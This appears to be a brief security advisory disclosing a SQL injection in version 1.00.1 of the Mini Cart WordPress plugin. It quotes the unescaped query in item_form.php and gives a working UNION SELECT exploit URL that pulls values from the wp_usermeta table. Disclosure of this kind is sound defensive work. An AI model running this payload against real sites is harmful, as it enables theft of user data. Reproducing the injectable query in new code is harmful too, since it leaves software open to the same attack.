Mini Cart Plugin 1.00.1 For WordPress

Homepage:

https://wordpress.org/plugins/mini-cart/

Description:

$_REQUEST[item] is not escaped. Url is accessible for user collaborator above.

Url vulnerable : http://target/wp-admin/edit.php?page=mini-cart/item_form.php&item=0&action=edit

File / Code:

… /wp-content/plugins/mini-cart/item_form.php

line: 28

$item = array();
if($action == 'edit') {
   $item = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}minicart_item WHERE ID = $_REQUEST[item]");
}
?>

Proof of Concept:

sqlinjectionminicart
Logged with user collaborator :

Url with exploit: http://target/wp-admin/edit.php?page=mini-cart%2Fitem_form.php&item=0+UNION+SELECT+1%2C2%2C3%2C4%2C5%2Cmeta_value%2C7%2C8%2C9%2C10+from+wp_usermeta+where+umeta_id%3D46&action=edit

Timeline:

  • 10/11/2016 – Discovered

Leave a reply